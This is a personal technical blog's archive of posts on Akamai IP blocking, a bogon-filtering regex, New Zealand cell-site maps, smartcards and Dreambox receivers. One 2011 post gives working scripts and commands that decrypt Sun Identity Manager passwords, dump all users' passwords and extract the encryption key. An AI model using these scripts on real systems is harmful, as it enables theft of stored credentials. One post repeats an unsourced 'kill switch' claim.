Akamai IP Reputation Filter

, posted: 31-May-2018 11:53

So today I had an interesting issue where I was unable to access a web site from a customers internet connection.

It seems that Akamai IP Reputation Filter has for some reason decided that the reputation of this IP address has some random issue that will prevent me from accessing their web site.

The sites I can't access include:

www.jbhifi.co.nz

shop.countdown.co.nz

When I attempt to access the sites I get:

------

Access Denied

You don't have permission to access "http://www.jbhifi.co.nz/" on this server.

Reference #18.67ff6dcb.1527719015.a6cebb8

------

At no point in the above do you have any idea this is related to Akamai Web Application Firewall blocking you. There are a number of not particularly helpful posts on the Akamai community talking about the issue.

https://community.akamai.com/customers/s/article/Why-is-Akamai-blocking-me?language=en_US

https://community.akamai.com/customers/s/question/0D50f00005RtpciCAB/cannot-access-any-akamai-hosted-sites?language=en_US

https://community.akamai.com/customers/s/question/0D50f00005RtpdLCAR/ip-address-blocked?language=en_US

And none of them provide any real resolution apart from contacting the site you are trying to access and then they can contact Akamai and figure out why.

So after a lengthy conversations it turns out the only way to resolve the issue is to send an email to "support at akamai.com" and then hopefully get to the bottom of why you are blocked.

My first email consisted of:

------

Akamai does not block users from accessing our customers’ websites. However, our customers can use tools and policies which may in turn block you (the end user). Our customers use these rules to protect them and you from malicious actors on the internet.

We have checked the logs you provided and have found you are being blocked because of a Web Application Firewall rule being triggered by your IP address. The most likely reason that a company or an end user may be blocked from several sites is due to Reputation-based blocking.  Billions of IP addresses interact with the Akamai Intelligent Platform every month, and the Client Reputation module provides information regarding the reputation of each of them. Customers with this module enabled can block IP addresses whose reputation exceeds a certain configurable threshold.

Some of other reasons that a block may be happening are:

Explicit IP blocking / blacklisting

Location-based blacklisting

Rule-based blocking (i.e. web application firewall protections)

HTTP request rate controls (e.g. DoS protections)

We cannot unblock your IP address as it is the Akamai clients who make up the rules to block certain customers. You can check directly with the website owners why your IP is being blocked if you feel you have not done any harm or any illegal activities on the site you are being blocked. 

Having said this, I have checked x.x.x.x and its not being blocked.

------

So that's no use at all, as we are still blocked. When I finally manage to figure out how to unblock our IP address I will update this blog.



Bogon Filtering using Regex

, posted: 24-Jan-2018 13:16

I had to filter the Bogon (RFC1918 + CGNAT (RFC6598) + Loopback (RFC990) + Link Local (RFC3927)) from within a proxy server I was setting up. RFC5735 covers a lot of the non-routeable addresses all in a single RFC with the exception of CGNAT. I used this page as a start and tweaked it to my own requirements.

My regex testing site of preference is: https://regex101.com/ as it has an excellent UI to test with and breaks out what the regex is doing.

This is the regex I ended up with:

((?:10|127)(?:\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){3})|((?:192\.168|169\.254|172\.(?:1[6-9]|2[0-9]|3[0-1])|100\.(?:6[4-9]|[7-9][0-9]|1[0-1][0-9]|12[0-7]))(?:\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){2})

Reading it the regex blocks the following ranges:

10.0.0.0/8 & 127.0.0.0/8

Regex: ((?:10|127)(?:\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){3})

Explanation - A non capture group ?: match 10 or 127 then capture ". + 1-255" {3} times as a non capture group.

 

192.168.0.0/16 & 169.254.0.0/16

Regex: ((?:192\.168|169\.254)(?:\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){2})

Explanation: A non capture group ?: match 192.168 or 169.254 then capture ". + 1-255" {2} times as a non capture group.

 

172.16.0.0/12

Regex: ((172\.(?:1[6-9]|2[0-9]|3[0-1])(?:\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){2})

Explanation: "172." then non capture group 16-19 or 20-29 or 30-31 then capture ". + 1-255" {2} times as a non capture group.

 

100.64.0.0/10

Regex: ((100\.(?:6[4-9]|[7-9][0-9]|1[0-1][0-9]|12[0-7])(?:\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){2})

Explanation: "100." then non capture group 64-69 or 70-99 or 100-119 or 120 to 127 then capture ". + 1-255" {2} times as a non capture group.

 

Hope someone finds this useful.



Extracting encrypted passwords from Sun Identity Manager

, posted: 2-Nov-2011 20:25

For my sins I am using Sun IDM.  And I was somewhat disappointed at how easy it is to extract any password from Sun IDM without needing any authentication.  As long as you have comand line access to call the LH you can extract the configurator password.  Here are a few links I found on this topic.

http://www.darkedges.com/blog/?p=7
http://zerointechnologies.com/sun-idm-decrypt-password.html

The second link includes the javascript code needed, but a session needs to be established first.  So this is the modified code I used.

/* Decrypt Sun IDM Passwords */
importPackage(Packages.com.waveset.util);
importPackage(Packages.com.waveset.server);
var _lhSession = new InternalSession();
print("Encrypted = " + arguments[0]);
var pwd = new EncryptedData();
pwd.fromString(arguments[0]);
print("Decrypted = " + pwd.decryptToString());
/* End */

Then have the above script called pwd.js.  Calling it as shown below:

./lh js pwd.js "3A961D0D453E218C:6BCF235D:122ED7C4BB6:-7FA4|GsggQAq2YSSbb1sZE9Xaxw=="
Encrypted = 3A961D0D453E218C:6BCF235D:122ED7C4BB6:-7FA4|GsggQAq2YSSbb1sZE9Xaxw==
Decrypted = configurator


So... to get the encrypted password you want, a modified version of the JS to take an input file and return the passwords:

/* Decrypt Sun IDM Passwords */
importPackage(Packages.java.util);
importPackage(Packages.java.io);
importPackage(Packages.com.waveset.object);
importPackage(Packages.com.waveset.session);
importPackage(Packages.com.waveset.util);
var _lhSession = new InternalSession();
var file = new FileReader(arguments[0]);
var br = new BufferedReader(file);
var line;
while ((line = br.readLine()) != null) {
var obj = _lhSession.getObject(Type.USER, line);
var pwd = new EncryptedData();
pwd.fromString(obj.getAttribute("password"));
print(obj.getName() + "," + pwd.decryptToString());
}
/* End */

Plus i've now got the offline decryption working too by extracting out the encryption key:

$WSHOME/bin/lh console -c "getObject EncryptionKey *"

And the Misc data:

/* Extract Misc Data */
importPackage(Packages.com.waveset.object);
importPackage(Packages.com.waveset.session);
var _lhSession = new InternalSession();
var obj = _lhSession.getObject(Type.MISCELLANEOUS, "miscData");
print("Result" + obj.toXml());
/* End */

Then call the javascript:

$WSHOME/bin/lh js misc.js

Using the code shown above from Dark Edges.

Sad.. But true.




NZ Cell Site location information - Now with Google Fusion Tables!

, posted: 26-Aug-2011 13:00

Many of you may know that I have an existing blog entry with KML files you can download or load up in Google Earth here: http://www.geekzone.co.nz/BarTender/7403

So... Now thanks to Mark Hansen and is great work he did drawing all the links nationwide http://markhansen.co.nz/nz-wireless-map/

I've come to learn of Google Fusion Tables.  Now the super cool thing about Fusion Tables is you can map data from a table in fusion tables directly into Google Maps and not have the annoying 1000 Placemark limit you have with KMLs plus sluggish response when loading a KML file into Google Maps.

With Google Fusion you can either map directly from with Fusion from your dataset, or write up a small web page and do some pretty stuff.  I've got the web page so then I can add a Fusion Tables style in so all the place marks have a "T"/"V" etc depending on if it's a Telecom or Vodafone site.

Try V2 of The NZ Cell Information: http://dl.dropbox.com/u/22487235/fusion.html

If you look in the html it lists the Fusion Table data that I extracted out of RSM which can be found here: 1355049




NZ Cell Site Information

, posted: 26-Sep-2010 14:52

I have extracted the data out of the Radio Spectrum Management Database Spectrum Search Lite which is the Government agency who controlls all radio frequencies in NZ. They kindly put up their whole database as a Access 97 DB free for download (Yay for Open Govt!).  So this is the frequencies that the companies are allowed to transmit from, not necessarily an actual Cell Site.  But more often that not it IS a cell site.
First I transferred the Access Database into a SQLite Database using mdb-sqlite. Then using a SQL Query and Saxon I manipulated the files into KML Files.

NEW UPDATE:

I've been playing around with Google Fusion thanks to Mark Hanson's great entry showing how he used the RSM data to get all the radio links: http://wirelessmap.markhansen.co.nz/

Now I have a Google Fusion site showing all sites.

Update: I've just added Carrier specific kml's with icons at each site saying what frequencies are transmitted from that site.

Update, this is a work in progress with updated data and displaying the data slightly differently.

RSM Database dump 20 June 2011

If you want a copy of the whole archive to create the KMLs from the RSM Database download just PM me and I will send you the link.

All Sites


All Cell Sites by Carrier:
This lists all Cell Sites broken down by carrier.  The Google Maps 1000 Feature Limit means that it won't load properly in anything other than Google Earth.
KML and Google Maps Link

This has just Telecom, Voda, 2Deg and Woosh, and all the frequencies on a per-site basis.  It still doesn't open very well in Google Maps due to the large number of Placemarks.
And a GPS with the Site Name - Provider and Location all in the Name string:
http://sites.google.com/site/nzcellinfo/forgps.kml or Google Maps Link

Telecom

All Telecom Sites: CDMA, XT850 and XT2100
KML or Google Maps Link

Telecom CDMA:
KML or Google Maps Link
Telecom XT 850 Mhz:
KML or Google Maps Link
Telecom XT 2100 Mhz:
KML or Google Maps Link

Vodafone

All Vodafone Sites: 900, 1800 and 2100
KML or Google Maps Link

Vodafone GSM 900:
KML or Google Maps Link
Vodafone GSM 1800:
KML or Google Maps Link
Vodafone WCDMA 2100:
KML or Google Maps Link

Note: I'm not sure which 900Mhz sites are 2G and which are 3G Extended.  This isn't registered in RSM since Vodafone own the frequency and can do what they like with it.

Two Degrees

All Two Degrees Sites: 900, 1800 and 2100
KML or Google Maps Link

Two Degrees GSM 900:
KML or Google Maps Link
Two Degrees GSM 1800:
KML or Google Maps Link
Two Degrees WCDMA 2100:
KML or Google Maps Link

Custom Two Degrees Maps

And New Cell Site Locations (that only have microwave backhaul so far).

KML or Google Maps Link

And All 2D Locations across the country.

KML or Google Maps Link



Woosh

Woosh TD-CDMA 2067.5:
KML or Google Maps Link

Any other mobile networks I should add, just PM me.

Feel free to redistribute in any format you want, as this is public information from RSM anyway.



Fun with Snapper - Take 1

, posted: 20-Jul-2009 08:15

After getting a Snapper USB I thought I would look into what it's all about a bit more, and see if I can see what's going on and look into the card using Linux. Firstly it took a while to figure out where to find the USB Driver software, as the Snapper site isn't exactly obvious on where you download it from: http://www.snapper.co.nz/setup <- The main start page https://www.snapper.co.nz/setup/step/1 <- Download the ActiveX control https://www.snapper.co.nz/setup/step/2 <- Download either the USB or Snapper Feeder driver Or direct links: https://www.snapper.co.nz/global/plugin/driver_exe/Snapper_Feeder_Driver_Setup.exe https://www.snapper.co.nz/global/plugin/driver_exe/Snapper_USB_Driver_Setup.exe https://www.snapper.co.nz/setup/step/3 <- Phone home to see if it all works. Ok, so you can start off with getting the ActiveX control installed, this is why you need IE (ugh) Then after I had the drivers installed I found out it's a Smartcard, in fact it's a JCOP 3.1 card as per its ATR. Using standard smartcard interrogation tools, I found the ATR for the USB is: "3B 69 00 FF 4A 43 4F 50 33 31 56 32 32" which means it's a JCOP 31 v22 72K as per: http://ludovic.rousseau.free.fr/softwares/pcsc-tools/smartcard_list.txt Ok, so it's a pretty secure card, banking quality so doing anything untoward is pretty much out. Now on to see if I can get GPShell working with it: http://sourceforge.net/projects/globalplatform/ ... Watch this space.



Gemini image blowing up Clone Dreamboxes

, posted: 19-Apr-2008 14:14

Just a FYI for you clone dreambox owners out there.

It seems that in an "Attack on the Clones" the Gemini team have released a kill switch after you have been running the image for a while as part of their 4.x (but especially 4.3 and 4.31) images that will brick your Clone DM500 to a point that you will never be able to get it back.

My recommendation is to run the PLi image, but for those looking at putting a Gemini image on your clone box ... just say no.



Daylight Savings in NZ

, posted: 2-Apr-2008 20:23

One thing you Kiwi's may be having is the DST Start & Stop times in all the Dreambox images (PLi & Gemini) are not correct, so you need a correct Timezone file.

I have posted a entry on the PLi site about this here: http://www.pli-images.org/forum/viewthread.php?forum_id=28&thread_id=5762

You need to download the zoneinfo.tgz, extract out the file "Auckland" and rename it to "localtime" then ftp it to /var/etc which is where the localtime with incorrect DST start and stop times is at.  Then reboot your box by telneting to the box and typing reboot.

Then you should be done and the timezone should be fine!.



Changing MAC address

, posted: 4-Feb-2008 09:38

I was asked this and didn't know the answer, as the boxes I have had always have unique mac address, so it was never a problem... however it was pretty easy to change as detailed below:

Telnet to the DM, and type the following commands:

cd /var/etc
rm init
echo \#!/bin/sh >> init
echo ifconfig eth0 down >> init
echo ifconfig eth0 hw ether xx:xx:xx:xx:xx:xx >> init
echo ifconfig eth0 up >> init
chmod 755 init
reboot

You need to change the xx:xx:xx to the mac address you want.  Then the box will reboot... and the MAC address is changed.   Easy!



Moteck Motor Setup on a Dreambox

, posted: 18-Jan-2008 13:44

After playing around for a while deeply confused why I couldn't get my newly purchased Moteck Satellite motor (ex trademe!) to correctly point to Optus D1 I figured out my problem.

I found on another site the following:

The file you need to modify is the /var/tuxbox/config/enigma/config file. The Diseqc 1.2 motor settings are in the line starting with 's:/elitedvb/DVB/config/lnbs/0/RotorTable'

Example Settings are:
s:/elitedvb/DVB/config/lnbs/0/RotorTable=-0300014-0220030-0180011-0150029.......

Yours may/will well be different but you get the idea..... The format is:
Entry "-0300014"
"-0300" = 030.0 West (Hispa)
"014" = stored position 14

or

+0192002
+0192 = 019.2 East
002 = stored position 2

Whenever I load a new image I select diseqc complex setup, untick the USALS setting, save and exit, then load captains settings, reboot.

So What I needed to do was change:

s:/elitedvb/DVB/config/lnbs/0/RotorTable=+1600000

As I had configured D1 (160.0 East) to Stored Position 0. So I needed to remove that and set it to:

s:/elitedvb/DVB/config/lnbs/0/RotorTable=

This then meant that the GotoXX was always used and hopefully (once the motor is up on my roof!) the motor will move to the right location for each satellite!.

that took me ages to figure out!



BarTender's profile

Bar Tender
Wellington
New Zealand